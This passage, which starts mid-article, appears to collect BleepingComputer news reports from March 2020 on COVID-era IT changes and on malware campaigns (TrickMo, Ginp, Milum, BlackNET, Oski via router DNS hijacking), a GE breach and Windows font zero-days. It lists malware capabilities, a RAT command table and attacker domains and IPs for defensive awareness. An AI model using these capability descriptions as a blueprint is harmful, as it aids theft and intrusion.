Once they receive this alert, their TeamViewer ID is added to a bucket of users who will continue to see this message when using TeamViewer. The only way to use TeamViewer again for personal use is to submit a request to have their TeamViewer ID reset.

After reaching out to the TeamViewer, TheRegister was told that TeamViewer is stopping the checks for commercial users in regions heavily affected by the Coronavirus.

"We have stopped checking connections for commercial use in heavily affected regions like China and Italy already some weeks ago and are currently implementing that for lots of other affected countries including UK," TeamViewer told TheRegister.

In a statement to BleepingComputer, TeamViewer stated that the USA is region where commercial checks are not being conducted anymore.

"Yes, the US is also included now in the regions where we don’t check commercial use anymore to allow individuals (not commercial companies) to use TeamViewer in the current crisis situation for whatever purpose they need it," TeamViewer told BleepingComputer.

Update 3/25/20: Added TeamViewer's statement about the USA.


Microsoft Pauses Optional Windows Cumulative Updates Starting in May
29
.3.2020  Bleepingcomputer  OS

Due to the ongoing Coronavirus pandemic, Microsoft will stop releasing optional Windows cumulative updates starting in May 2020. This includes all supported Windows 10 and Windows Server versions.

As employees move towards working remotely and thus an adjusted work schedule, companies have started to pause the release of new versions of their software to prevent critical bugs from arising and not having the manpower to respond to them.

This was already seen with Google pausing new versions of Chrome and Microsoft following with the pausing of new Edge versions.

When Microsoft releases updates, they release what is called the "B" updates on the second Tuesday of every month, which is known as Patch Tuesday. These updates are considered mandatory as they contain security updates for vulnerabilities discovered or fixed since the last Patch Tuesday.

Microsoft also releases the optional cumulative "C" and "D" updates on the third and fourth weeks of each month. These updates are typically bug fixes and are considered optional to install as the fixes will ultimately be rolled into the following month's Patch Tuesday release.

Today, Microsoft announced that starting in May 2020 it will pause all optional non-security updates for all supported versions of Windows, including Server versions and prioritize their focus on security updates.

"We have been evaluating the public health situation, and we understand this is impacting our customers. In response to these challenges we are prioritizing our focus on security updates. Starting in May 2020, we are pausing all optional non-security releases (C and D updates) for all supported versions of Windows client and server products (Windows 10, version 1909 down through Windows Server 2008 SP2)."

Microsoft emphasizes that this will not impact their monthly scheduled B release on Patch Tuesday and those updates will continue as normal to ensure users are protected and can continue to be productive.

Microsoft also states that security will be their primary focus during the outbreak. This means that if a critical vulnerability is discovered, we would also continue to see out-of-band (OOB) security updates released.

Unfortunately, as many bugs in the Windows operating system are fixed in the optional cumulative updates (C & D), fixes that are not high priority may take a bit longer to resolve.


TrickBot Bypasses Online Banking 2FA Protection via Mobile App
29
.3.2020  Bleepingcomputer  Safety

The TrickBot​​​​​ gang is using a malicious Android application they developed to bypass two-factor authentication (2FA) protection used by various banks after stealing transaction authentication numbers.

The Android app dubbed TrickMo by IBM X-Force researchers is actively being updated and it is currently being pushed via the infected desktops of German victims with the help of web injects in online banking sessions.

TrickBot's operators have designed TrickMo to intercept a wide range of transaction authentication numbers (TANs) including one-time password (OTP), mobile TAN (mTAN), and pushTAN authentication codes after victims install it on their Android devices.

Spotted for the first time in September 2019
TrickMo was initially spotted by CERT-Bund security researchers who said at the time that TrickBot-infected Windows computers will ask for the victims' online banking mobile phone numbers and device types to prompt them to install a bogus security app.

At the moment, the malicious app is only being pushed by the TrickBot operators only to German targets and it will "camouflage" itself as an 'Avast Security Control' app or as 'Deutsche Bank Security Control' utility.

Once installed on their phones, the app will forward text messages containing mTANs sent by the victims' banks to TrickBot's operators who can later use them to make fraudulent transactions.

Avast Security Control installation screen
Avast Security Control installation screen (Lukas Stefanko)
In a report analyzing TrickMo's capabilities published today, IBM X-Force researchers say that the malware is capable of preventing users of infected devices from uninstalling it, sets itself as the default SMS app, monitors running apps, and scrapes on-screen text.

"From our analysis of the TrickMo mobile malware, it is apparent that TrickMo is designed to break the newest methods of OTP and, specifically, TAN codes often used in Germany," IBM's researchers explain.

"Android operating systems include many dialog screens that require the denial, or approval, of app permissions and actions that have to receive input from the user by tapping a button on the screen.

"TrickMo uses accessibility services to identify and control some of these screens and make its own choices before giving the user a chance to react."

This allows the Android Trojan to delete SMS messages it forwards to its masters so that the victims are never aware that their devices received a text message with a 2FA code from their banks.

Wide range of 'features'
The malware is also capable of gaining persistence on infected Android devices by registering a receiver that will listen for android.intent.action.SCREEN_ON and android.provider.Telephony.SMS_DELIVER broadcasts to restart itself after a reboot when the screen turns on or an SMS is received.

TrickMo is heavily obfuscated to hinder analysis and it was recently updated, in January 2020, with code that checks if the malware is running on a rooted device or an emulator.

From its large array of capabilities, the IBM X-Force researchers highlighted TrickMo's main ones designed for:

• Stealing personal device information
• Intercepting SMS messages
• Recording targeted applications for one-time password (OTP)/mobile TAN (mTAN)/pushTAN theft
• Lockdown of the phone
• Stealing pictures from the device
• Self-destruction and removal

TrickBot — a continuously updated banking malware
TrickBot is a modular banking malware continuously upgraded by its authors with new capabilities and modules since October 2016 when it was first spotted in the wild.

Although the first detected variants only came with banking Trojan capabilities used for harvesting and exfiltrating sensitive data, TrickBot has now evolved into a popular malware dropper that will infect compromised systems with other, some times more dangerous, malware strains.

TrickBot can deliver other malware as part of multi-stage attacks, Ryuk ransomware being one of the most notable ones, most likely after all useful information has been already collected and stolen.

The malware is also especially dangerous as it can propagate throughout enterprise networks and, if it gains admin access to a domain controller, it can steal the Active Directory database to obtain other network credentials.


Windows 10 Optional Cumulative Update KB4541335 Released
28
.3.2020  Bleepingcomputer  OS

Microsoft is rolling out March optional cumulative update for Windows 10 November 2019 Update (version 1909) and Windows 10 May 2019 Update (version 1903) with several fixes and improvements.

This is an optional update and it won't download or install automatically on your device unless you manually select 'Download and install' in Windows Update page. The key changes include fixes for an issue that prevents the mute button from working on certain devices with the Your Phone app and fix for a bug crashing File Explorer.

Like every Windows Update, you can open the Settings app and click on the Windows Update option to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

KB4541335 comes with the following improvements for Windows 10 November 2019 Update (version 1909) and Windows 10 May 2019 Update (version 1903):

Addresses an issue that causes an error when printing to a document repository.
Addresses an issue that displays a misleading reset message for Win32 apps that are converted to Universal Windows Platform (UWP) apps, such as Microsoft Sticky Notes, Microsoft OneNote, and so on.
Addresses a drawing issue with the Microsoft Foundation Class (MFC) toolbar that occurs when dragging in a multi-monitor environment.
Addresses an issue that prevents the first key stroke from being recognized correctly in the DataGridView cell.
Addresses a performance issue in applications that occurs when content that is protected by digital rights management (DRM) plays or is paused in the background.
Addresses an issue that causes attempts to take a screenshot of a window using the PrintWindow API to fail.
Addresses an issue that causes File Explorer to close unexpectedly when using roaming profiles between different versions of Windows 10.
Addresses an issue that fails to return search results in the Start menu Search box for users that have no local profile.
Addresses an issue that causes applications to close unexpectedly when a user enters East Asian characters after changing the keyboard layout.
Addresses an issue that prevents the mute button from working on certain devices with the Microsoft Your Phone app.
Addresses an issue that causes calendar dates to appear on the wrong day of the week in the clock and date region of the notification area when you select the Samoa time zone.
Addresses an issue in which table formatting fails in the PowerShell Integrated Scripting Environment (ISE) during a remote session. The error message is, "Remote host method get_WindowsSize is not implemented".
Addresses an issue with reading logs using the OpenEventLogA() function.
Addresses an issue that might cause domain controllers (DC) to register a lowercase and a mixed or all uppercase Domain Name System (DNS) service (SRV) record in the _MSDCS. DNS zone. This occurs when DC computer names contain one or more uppercase characters.
Addresses an issue that might cause a delay of up to two minutes when signing in or unlocking a session on Hybrid Azure Active Directory-joined machines.
Addresses an issue that causes authentication in an Azure Active Directory environment to fail and no error appears.
Addresses an issue that prevents machines that have enabled Credential Guard from joining a domain. The error message is "The server's clock is not synchronized with the primary domain controller's clock."
Addresses an issue that causes authentication to fail when using Azure Active Directory and the user’s security identifier (SID) has changed.
Addresses an issue that prevents some machines from automatically going into Sleep mode under certain circumstances because of Microsoft Defender Advanced Threat Protection (ATP) Auto Incident Response (IR).
Addresses an issue that prevents some machines from running Microsoft Defender ATP Threat & Vulnerability Management successfully.
Improves support for non-ASCII file paths for Microsoft Defender ATP Auto IR.
Addresses a performance issue with the Windows Runtime (WinRT) API that sends specific absorption rate (SAR) back-off values.
Addresses an issue in which a Windows.admx template is missing one of the SupportedOn tags.
Addresses an issue that prevents applications from closing.
Addresses an issue that creates the Storage Replica administrator group with the incorrect SAM-Account-Type and Group-Type. This makes the Storage Replica administrator group unusable when moving the primary domain controller (PDC) emulator.
Restores the constructed attribute in Active Directory and Active Directory Lightweight Directory Services (AD LDS) for msDS-parentdistname.
Addresses an issue with evaluating the compatibility status of the Windows ecosystem to help ensure application and device compatibility for all updates to Windows.
Addresses an issue that prevents Microsoft User Experience Virtualization (UE-V) settings from roaming to enable the signature files that are used for new messages, forwarded messages, and replies.
Addresses an issue that prevents the Network Policy Server (NPS) accounting feature from functioning. This occurs when NPS is configured to use SQL for accounting with the new OLE (compound document) database driver (MSOLEDBSQL.dll) after switching to Transport Layer Security (TLS) 1.2.
Addresses an issue that prevents standard user accounts that are configured with the maximum User Account Control (UAC) settings from installing Language Features On Demand (FOD) using the System settings.
Addresses an issue that causes attempts to complete the connection to a virtual private network (VPN) to fail; instead, the status remains at “Connecting.”


Ginp Mobile Banker Targets Spain with "Coronavirus Finder" Lure
28
.3.2020  Bleepingcomputer  Mobil

In today's deluge of malicious campaigns exploiting the COVID-19 topic, handlers of the Android banking trojan Ginp stand out with operation Coronavirus Finder.

They prey on the anxiety generated by the massive spread of the virus and launch on infected devices a page claiming to show the location infected people nearby for a small fee.

The purpose is to make victims provide payment card data in the hope of learning how close they are to infected individuals.

It's a particularly heinous campaign because it targets users in Spain, a country that's been hit hard by the new coronavirus: close to 3,000 people died from the virus and almost 40,000 are infected.

A loathsome lure
Ginp started in June 2019 as an SMS stealer and quickly evolved to a banking trojan, with code borrowed from Anubis, that targeted banks in Spain and the U.K.

In a recent version, the malware used the Accessibility feature in Android fake push notifications to make victims open apps for which Ginp had an overlay ready that asked for payment card data.

Researchers at Kaspersky are now seeing that Ginp operators are sending the malware a special command that opens a webpage called Coronavirus Finder.

The page claims that 12 people infected with the new coronavirus are in the vicinity of the victim and promises to show their location for 0.75 EUR.


This is just to lure the victim into providing their payment card data, which is delivered to the cybercriminals. Once the info is provided, nothing happens.

"They don’t even charge you this small sum (and why would they, now that they have all the funds from the card at their command?)," writes Alexander Eremin, malware analyst at Kaspersky, in a blog post today.


The source of inspiration for this lure may be the "Shield" mobile app recently released by the Israeli Ministry of Health, which alerts users if they've been at a location at the same time as a known Coronavirus carrier.

Telemetry data from Kaspersky shows that Ginp's main targets for this campaign are users in Spain. However, they warn that this operation may expand beyond Spain's territory.

"However, this is a new version of Ginp that is tagged “flash-2”, while previous versions were tagged “flash-es12”. Maybe the lack of “es” in the tag of the newer version means that cybercriminals plan to expand the campaign beyond Spain" - Alexander Eremin

These days, it is easy to render the new Ginp campaign ineffective: staying home ensures that you're at safe distance from people carrying COVID-19 (check here for guidelines from WHO).

Also, in this time of public health crisis, governments are the only entities with the most accurate information about the spread of the new coronavirus. If they make such an app available, they would not charge users for details on the current situation.

For mobile malware that does not use COVID-19 lures, following standard security recommendations should be enough to keep you safe:

install a reliable security solution
download apps from official sources
do not give apps other than antivirus permission to use the Accessibility feature
don't click on links from suspicious sources
don't provide sensitive information (access codes, logins, payment details) to forms that look suspicious


Adobe Fixes Critical Vulnerability in Creative Cloud Application
28
.3.2020  Bleepingcomputer  Vulnerebility

Adobe has released a security update for its Creative Cloud Desktop Application to fix a vulnerability that could allow attackers to delete files on a vulnerable computer.

The Adobe Creative Cloud is an application suite consisting of numerous apps such as Photoshop, Premiere Pro, Illustrator, Adobe Acrobat, InDesign, Lightroom, and XD.

Adobe normally releases its security updates on the second Tuesday of each month to align with Microsoft's Patch Tuesday.

This month, Adobe did not release any updates on Patch Tuesday but have been instead rolling them out as needed. For example, Adobe released security updates for Adobe Reader and Acrobat on March 17th.

In a new security bulletin released today, Adobe states that a 'Critical' vulnerability has been discovered in its Creative Cloud Desktop Application that could allow attackers to arbitrarily delete files on a computer.

This vulnerability is categorized as a 'Time-of-check to time-of-use (TOCTOU) race condition', which means that to exploit the vulnerability the attack would have to be timed in a precise way to achieve the desired results.

Vulnerability Category Vulnerability Impact Severity CVE Numbers
Time-of-check to time-of-use (TOCTOU) race condition Arbitrary File Deletion Critical CVE-2020-3808
This also appears to be a local attack, which means that an attacker or malware would need to be running on the machine before attempting to exploit the vulnerability.

To resolve these vulnerabilities, users should upgrade to Creative Cloud Desktop Application version 5.1.


Microsoft Cuts Back More Office 365 Features to Handle High Load
28
.3.2020  Bleepingcomputer  OS

Microsoft announced today new temporary changes to Office 365 services to adjust to the ever-increasing demand and the growing number of new Microsoft 365 customers working from home during the COVID-19 pandemic.

As detailed in the MC207439 announcement published today in the Office 365 Admin message center, Microsoft made several changes to OneNote, SharePoint, and Stream features in response to the high usage load.

"We've made some temporary service changes to prioritize core service functionality," Microsoft tweeted. "These changes are described in MC207439, which is available to service admins."

Last week, Microsoft made another series of tweaks to some non-essential Office 365 capabilities designed to deal with the growth in demand, reducing user presence check frequency, the interval at which the other party is shown as typing in chats, and the video resolution.

To have an idea on the number of new users actively using Office 365 services on a daily basis these days, the Microsoft Teams teamwork hub, one of its Office 365 enterprise subscription services, saw a huge influx of 12 million new daily active users within a single week bringing the total to 44 million.

Microsoft 365 temporary feature changes
"As a part of our commitment to customers and Microsoft cloud services continuity during these unprecedented times, we're making temporary adjustments to select capabilities within Microsoft 365," today's announcement says.

The new adjustments include OneNote tweaks dealing with editing now only available online, SharePoint video resolution downgrading and moving backend operations after working hours, as well as Stream meeting recording video resolution automatically set to 720p.

The full list of temporary adjustments to OneNote, SharePoint, and Stream features:

• OneNote:
- OneNote in Teams will be read-only for commercial tenants, excluding EDU. Users can go to OneNote for the web for editing.
- Download size and sync frequency of file attachments have been changed.
- You can find details on these and other OneNote related updates as http://aka.ms/notesupdates.
• SharePoint:
- We are rescheduling specific backend operations to regional evening and weekend business hours. Impacted capabilities include migration, DLP and delays in file management after uploading a new file, video or image.
- Reduced video resolution for playback videos.
• Stream:
- People timeline has been disabled for newly uploaded videos. Pre-existing videos will not be impacted.
- Meeting recording video resolution adjusted to 720p
The announcement also says that Microsoft 365 services are actively monitored so that new feature adjustments can be made whenever needed to avoid high load and user experience degrading.

"Microsoft is actively monitoring performance and usage trends to ensure we're optimizing service for our customers worldwide, and accommodating new growth and demand," a Microsoft spokesperson told BleepingComputer when asked about the cause of these recent developments.

"At the same time, these are unprecedented times and we’re also looking at what steps we can take to proactively prepare for these high-usage periods."

MC207439 announcement

Microsoft cloud services continuity commitment
"As demand continues to grow, if we are faced with any capacity constraints in any region during this time, we have established clear criteria for the priority of new cloud capacity," Microsoft explained in a blog post published yesterday.

"Top priority will be going to first responders, health and emergency management services, critical government infrastructure organizational use, and ensuring remote workers stay up and running with the core functionality of Teams. We will also consider adjusting free offers, as necessary, to ensure support of existing customers."

These feature adjustments come on the heels of a large scale Microsoft Teams outage that took place last Monday, affecting EU and US users between March 16 and March 17, with chat messages not being sent, team member management not working, and the admin portal being unreliable.

Microsoft also announced on March 5th that Microsoft Teams will be free during the next six months to give businesses a helping hand while moving towards a remote workplace during the novel coronavirus outbreak.

"These are certainly unprecedented and challenging times. It is not business as usual," Redmond added. "But, together, we can and will get through this."


Unknown Hackers Use New Milum RAT in WildPressure Campaign
28
.3.2020  Bleepingcomputer  Virus

Malware that shows no similarities with samples used in known campaigns is currently used to attack computers in various organizations. Researchers named the new threat Milum and dubbed the operation WildPressure.

Several samples of Milum were discovered in the wild at the end of last summer, with the first ones believed to have been created in March 2019.

Unknown threat actor
The first attacks using Milum were spotted last year in August but security Kaspersky’s GReAT (Global Research & Analysis Team) researchers believe that it made victims since at least the end of May, 2019.

Looking at the malware code (C++), the researchers could not find clues that could help them attribute Milum to a certain adversary, not even with low confidence.

“Their C++ code is quite common,” writes Denis Legezo, Kaspersky senior security researcher, in a technical analysis published today. Even the configuration data and the way it is parsed (Standard Template Library) are common, hence insufficient for attribution.

Checking the list of known victims was not helpful either. Based on Kaspersky telemetry, Milum “was exclusively used to attack targets in the Middle East,” some of them being in the industrial sector.

In September 2019, the researchers were able to sinkhole one of the command and control (C2) domains (upiserversys1212[.]com) used for the WildPressure campaign and noticed that most of the connecting IP addresses were from the Middle East (Iran), while others were likely network scanners, TOR exit nodes, or VPN‌ connections.

active Milum infections, source: Kaspersky
Milum is a new RAT
The malware is a fully-developed trojan with “solid capabilities for remote device management” of a compromised host. Its functionality includes the following:

Code Meaning Features
1 Execution
Silently execute received interpreter command and return result through pipe

2
Server to client

Decode received content in “data” JSON field and drop to file mentioned in “path” field

3
Client to server

Encode file mentioned in received command “path” field to send it

4
File info

Get file attributes: hidden, read only, archive, system or executable

5 Cleanup
Generate and run batch script to delete itself

6
Command result

Get command execution status

7
System information

Validate target with Windows version, architecture (32- or 64-bit), host and user name, installed security products (with WQL request “Select From AntiVirusProduct WHERE displayName <>'Windows Defender'”)

8
Directory list

Get info about files in directory: hidden, read only, archive, system or executable

9 Update
Get the new version and remove the old one

Three samples analyzed by Kaspersky, all of them almost identical, showed a compilation timestamp in March. While this information can be spoofed, the researchers have other reasons to believe that Milum is a new threat.

One is that they did not record infections with this malware until March 31. Another is a field found in the HTTP POST requests when communicating with the C2 that indicates the malware version 1.0.1.

“A version number like this indicates an early stage of development. Other fields suggest the existence of, at the very least, plans for non-C++ versions.”

Whoever is behind WildPressure seems to identify their targets with code (clientID) unfamiliar to the researchers: “839ttttttt,” “HatLandid3,” and “HatLandid30.” Analyzed Milum samples had different clientIDs, indicating targeted attacks.

Milum configuration data, source: Kaspersky
Legezo told BleepingComputer over email that there are no visible hints that WildPressure attackers plan to do more than collecting information from targeted networks. He warns that this can change in time because the campaign is ongoing and could develop into a different type of attack.

"Analysts must pay attention because the consequences of an attack against an industrial target can be devastating," says.


Windows Defender Fix For Windows 10: Enable Network Scanning
28
.3.2020  Bleepingcomputer  OS

A really simple fix for the Windows Defender alert that states items were skipped during a scan has been discovered and it involves just enabling network scanning.

Over the weekend, we reported that for the past few weeks Windows 10 users were receiving alerts stating that items were skipped when they performed scans using Windows Defender.

These alerts stated that "Windows Defender Antivirus scan skipped an item due to an exclusion or network scanning settings" but did not provide any further information as to what was causing it.

Alert

Günter Born who first reported about this issue has now discovered a fix that just entails enabling the scanning of network files.

Strangely, Microsoft states in their documentation that scanning network files is not recommended, but leaving scanning disabled will continue to display these alerts.

"Indicates whether to scan for network files. If you specify a value of $False or do not specify a value, Windows Defender scans network files. If you specify a value of $True, Windows Defender does not scan network files. We do not recommend that you scan network files," Microsoft documentation states.

To enable network scanning, simply open a PowerShell (Admin) window and enter the following command:

Set-MpPreference –DisableScanningNetworkFiles 0
You can confirm that the changes have been made, by using the Get-MpPreference command before and after the above command as shown below.

Before and after the Set-MpPreference command
Before and after the Set-MpPreference command
For network scanning to be enabled, the DisableScanningNetworkFiles must be set to False.

So what happened?
It seems that in the older Windows Defender engines network scanning was enabled by default.

In an older Windows 10 VM from right before the March Patch Tuesday updates, using the Get-MpPreference clearly shows that network scanning is enabled in the older engines.

Older Windows Defender engines
Older Windows Defender engines
After waiting a little while for the engines to update, you can see that the Windows Defender preferences show that network scanning has now been disabled by a newer engine.

Newer Windows Defender engines
Newer Windows Defender engines
It is not known why Microsoft decided to make this change, but the alerts appear to just indicate that network scanning was skipped.

If these alerts are bothering you, you can fix it by enabling network scanning as described above.


Fake Corona Antivirus Software Used to Install Backdoor Malware
28
.3.2020  Bleepingcomputer   Virus

Sites promoting a bogus Corona Antivirus are taking advantage of the current COVID-19 pandemic to promote and distribute a malicious payload that will infect the target's computer with the BlackNET RAT and add it to a botnet.

The two sites promoting the fake antivirus software can be found at antivirus-covid19[.]site and corona-antivirus[.]com as discovered by the Malwarebytes Threat Intelligence team and researchers at MalwareHunterTeam, respectively.

While the former was already taken down since Malwarebytes' report, the one spotted by MalwareHunterTeam is still active but it had its contents altered, with the malicious links removed and a donation link added to support the scammers' efforts — spoiler alert, no donations were made until now.

The malicious site

"Download our AI Corona Antivirus for the best possible protection against the Corona COVID-19 virus," the site reads. "Our scientists from Harvard University have been working on a special AI development to combat the virus using a mobile phone app.

Last but not least, the malicious sites' makers also mention an update that will add VR sync capabilities to their fake antivirus: "We analyse the corona virus in our laboratory to keep the app always up to date! Soon a corona antivirus VR synchronization will be implemented!"

If anyone would fall this, they would end up downloading an installer from antivirus-covid19[.]site/update.exe (link is now down) that will deploy the BlackNET malware onto their systems if launched.

BlackNET will add the infected device to a botnet that can be controlled by its operators:

• to launch DDoS attacks
• to upload files onto the compromised machine
• to execute scripts
• to take screenshots
• to harvest keystrokes using a built-in keylogger (LimeLogger)
• to steal bitcoin wallets
• to harvest browser cookies and passwords.

The BlackNET RAT, which was rated as 'skidware malware' by MalwareHunterTeam, is also capable to detect if it's being analyzed within a VM and it will check for the presence of analysis tools commonly used by malware researchers, per c0d3inj3cT's analysis.

BlackNET command panel
BlackNET command panel
The malware also comes with bot management features including restarting and shutting down the infected devices, uninstalling or updating the bot client, and opening visible or hidden web pages.

One of the sites promoting this bogus Corona Antivirus was spotted by MalwareHunterTeam on March 6, while the other was exposed by Malwarebytes' Threat Intelligence team in a report published today.

In somewhat related news, an HHS.gov open redirect is currently abused by attackers to deliver Raccoon info-stealing malware payloads onto targets' systems via a coronavirus-themed phishing campaign.

The actors behind these ongoing phishing attacks use the open redirect to link to a malicious attachment that delivers a VBS script previously spotted while being employed by the operators behind Netwalker Ransomware to deploy their payloads.

The World Health Organization (WHO), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Federal Trade Commission (FTC) have all warned about Coronavirus-themed phishing and attacks targeting potential victims from countries around the globe (1, 2, 3).


Hackers Hijack Routers’ DNS to Spread Malicious COVID-19 Apps
28
.3.2020  Bleepingcomputer  Hacking

A new cyber attack is hijacking router's DNS settings so that web browsers display alerts for a fake COVID-19 information app from the World Health Organization that is the Oski information-stealing malware.

For the past five days, people have been reporting their web browser would open on its own and display a message prompting them to download a 'COVID-19 Inform App' that was allegedly from the World Health Organization (WHO).

After further research, it was determined that these alerts were being caused by an attack that changed the DNS servers configured on their home D-Link or Linksys routers to use DNS servers operated by the attackers.

As most computers use the IP address and DNS information provided by their router, the malicious DNS servers were redirecting victims to malicious content under the attacker's control.

Hijack Windows NCSI active probes
At this time, it is not known how the attackers are gaining access to the routers to change their DNS configuration, but some users state that they had remote access to the router enabled with a weak admin password.

Once the attackers gained access to the router, they would change the configured DNS servers to 109.234.35.230 and 94.103.82.249, which would also be configured on most computers that connect to the router.

Configured with malicious DNS servers
Configured with malicious DNS servers
When a computer connects to a network, Microsoft utilizes a feature called 'Network Connectivity Status Indicator (NCSI)' that is used to periodically run probes that check whether a computer is actively connected to the Internet.

In Windows 10, one of these active probes will be to connect to the http://www.msftconnecttest.com/connecttest.txt site and check if the returned content contains the string 'Microsoft Connect Test'.

If it does, then the computer is connected to the Internet and if it isn't, Windows warns that the Internet is not accessible.

For victims of this attack, when Windows performs this NCSI active probe, instead of being connected to the legitimate 13.107.4.52 Microsoft IP address, the malicious DNS servers send you to a web site located at 176.113.81.159.

As this IP address is under the attacker's control, instead of sending back a simple text file, they display a page prompting the victim to download and install a fake 'Emergency - COVID-19 Informator' or 'COVID-19 Inform App' from the WHO as shown below.

Msftconnecttest page promoting fake COVID-19 information app
Msftconnecttest page promoting fake COVID-19 information app
If a user downloads and installs the application, instead of receiving a COVID-19 information application they will have the Oski information-stealing Trojan installed on their computer.

When launched, this malware will attempt to steal the following information from the victim's computer:

browser cookies
browser history
browser payment information
saved login credentials
cryptocurrency wallets
text files
browser form autofill information
Authy 2FA authenticator databases
a screenshot of your desktop at the time of infection, and more.
This information will then be uploaded to a remote server so that it can be collected by the attackers and used to perform further attacks on your online accounts.

This could be to steal money from bank accounts, perform identity theft, or further spear phishing attacks.

What you should do if affected by this attack
If your browser is randomly opening to a page promoting a COVID-19 information app, then you need to login to your router and make sure you configure it to automatically receive its DNS servers from your ISP.

As every router has a different way of configuring DNS servers, it is not possible to give a specific method on how to do this.

In general, you will want to follow these steps:

Login to your router
Find the DNS settings and make sure there are no servers, especially 109.234.35.230 and 94.103.82.249, manually configured. If they are, set the DNS servers setting to 'Automatic' or ISP assigned.
Then save your configuration.
You should now be able to reboot your mobile devices, game consoles, and computers so that they use the correct DNS settings from your ISP.

As people are reporting that they think their settings were changed because of a weak password and that remote administration was enabled, it is important to change your password to something stronger and to disable remote administration on the router.

Finally, if you downloaded and installed the COVID-19 app, you should immediately perform a scan on your computer for malware.

Once clean, you should change all of the passwords for sites whose credentials are saved in your browser and you should change the passwords for any site that you visited since being infected.

When resetting your passwords, be sure to use a unique password at every site.

Update 3/24/20: Security researcher Fumik0_ told BleepingComputer that based on the network traffic, this is the Oski information-stealer, not Vidar. Article updated.


Tech Giant GE Discloses Data Breach After Service Provider Hack
28
.3.2020  Bleepingcomputer   Incindent

Fortune 500 technology giant General Electric (GE) disclosed that personally identifiable information of current and former employees, as well as beneficiaries, was exposed in a security incident experienced by one of GE's service providers.

GE is a multinational operating in a wide range of tech segments including aviation, power, healthcare, and renewable energy, and it is currently ranked by Fortune 500 as the 21st-largest company in the U.S. by revenue.

GE currently has customers in more than 180 countries and in excess of 280,000 employees according to the company's 2018 annual report.

Employees and beneficiaries' PII exposed
GE says in a notice of data breach filed with the Office of the California Attorney General that Canon Business Process Services (Canon), a GE service provider, had one of their employees' email accounts breached by an unauthorized party in February.

"We were notified on February 28, 2020 that Canon had determined that, between approximately February 3 - 14, 2020, an unauthorized party gained access to an email account that contained documents of certain GE employees, former employees and beneficiaries entitled to benefits that were maintained on Canon’s systems," the notification says.

GE also states that the sensitive personal information exposed during the incident was uploaded by or for current and former GE employees, as well as "beneficiaries entitled to benefits in connection with Canon’s workflow routing service."

Among the information the attacker gained access to during the breach, GE mentions:

[..] direct deposit forms, driver’s licenses, passports, birth certificates, marriage certificates, death certificates, medical child support orders, tax withholding forms, beneficiary designation forms and applications for benefits such as retirement, severance and death benefits with related forms and documents, may have included names, addresses, Social Security numbers, driver’s license numbers, bank account numbers, passport numbers, dates of birth, and other information contained in the relevant forms.
GE systems not breached
According to the notice of data breach GE's systems were not affected by the Canon security breach and it's taking measures to prevent a similar incident from happening in the future.

"Canon is offering identity protection and credit monitoring services to affected individuals for two years at no cost to you through a company called Experian," the notice also says.

Affected individuals who receive the breach notification letters from GE have until June 30, 2020, to take advantage of these services.

GE has also set up a support hotline at 1-800-432-3450 that affected individuals can call between 9 AM and 5 PM Eastern time, Monday through Friday.

BleepingComputer has reached out to GE for more details but had not heard back at the time of this publication.

Update March 23, 18:33 EDT: When asked about the estimated number of current and former GE employees affected by the breach, a GE spokesperson sent the following statement:

We are aware of a data security incident experienced by one of GE’s suppliers, Canon Business Process Services, Inc. We understand certain personal information on Canon’s systems may have been accessed by an unauthorized individual. Protection of personal information is a top priority for GE, and we are taking steps to notify the affected employees and former employees.


Microsoft Warns of Hackers Exploiting Unpatched Windows Bugs
28
.3.2020  Bleepingcomputer  Exploit

Microsoft warned today of targeted attacks actively exploiting two zero-day remote code execution (RCE) vulnerabilities found in the Windows Adobe Type Manager Library and impacting all supported versions of Windows.

"Microsoft is aware of limited targeted attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released," the company says.

The two RCE security flaws exist in Microsoft Windows "when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format."

Microsoft has rated the vulnerabilities as Critical and says that they are impacting machines running desktop and server Windows releases, including Windows 10, Windows 8.1, Windows 7, and multiple versions of Windows Server.

Microsoft is aware of limited targeted attacks that could leverage unpatched vulnerabilities in the Adobe Type Manager Library, and is providing guidance to help reduce customer risk until the security update is released. See the link for more details. https://t.co/tUNjkHNZ0N

— Security Response (@msftsecresponse) March 23, 2020
Microsoft is working on a fix
Microsoft says that a fix for the vulnerabilities is currently being developed and hints at a future release coming during next month's Patch Tuesday (on April 14).

"Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month," the advisory reads.

"This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers."

Users of Windows 7, Windows Server 2008, or Windows Server 2008 R2 are required to have an ESU license to receive future security updates fixing these issues (more information here).

On Windows 10 devices successfully exploiting the two zero-day vulnerabilities will only lead to code execution with limited privileges and capabilities within an AppContainer sandbox context according to Microsoft's advisory.

However, attackers could still potentially install programs, view, change, or delete data, or even create new accounts with full user rights.

To exploit the two security issues, attackers can either trick potential victims into opening maliciously crafted documents or to view them via the Windows Preview pane — the Outlook Preview Pane is NOT an attack vector.

To be clear and despite its name, this is *not* Adobe code. Microsoft was given the source code for ATM Light for inclusion in Windows 2000/XP. After that, Microsoft took 100% responsibility for maintaining the code.

— Rosyna Keller (@rosyna) March 23, 2020
Zero-days workarounds
To reduce the risks of attacks abusing these two zero-days, Microsoft advises customers to disable the Preview and Details panes in Windows Explorer to prevent the automatic display of OTF fonts.

"While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability," Microsoft adds.

Disabling the WebClient service can also help protect vulnerable systems from ongoing attempts to exploit the flaws "by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service."

"After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet," Microsoft adds.

Renaming the actual library (ATMFD.DLL) to prevent potential exploits from working is another recommended workaround.

Detailed procedures on how to disable the Windows Explorer Preview/Details panes and the WebClient service, as well as on how to rename ATMFD.DLL on 32-bit and 64-bit systems are available in the security advisory.

CISA urges users to apply workarounds to address RCE vulnerabilities in Microsoft’s Adobe Type Manager Library being exploited in the wild. https://t.co/l3G5JBily2 #Cyber #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) March 23, 2020
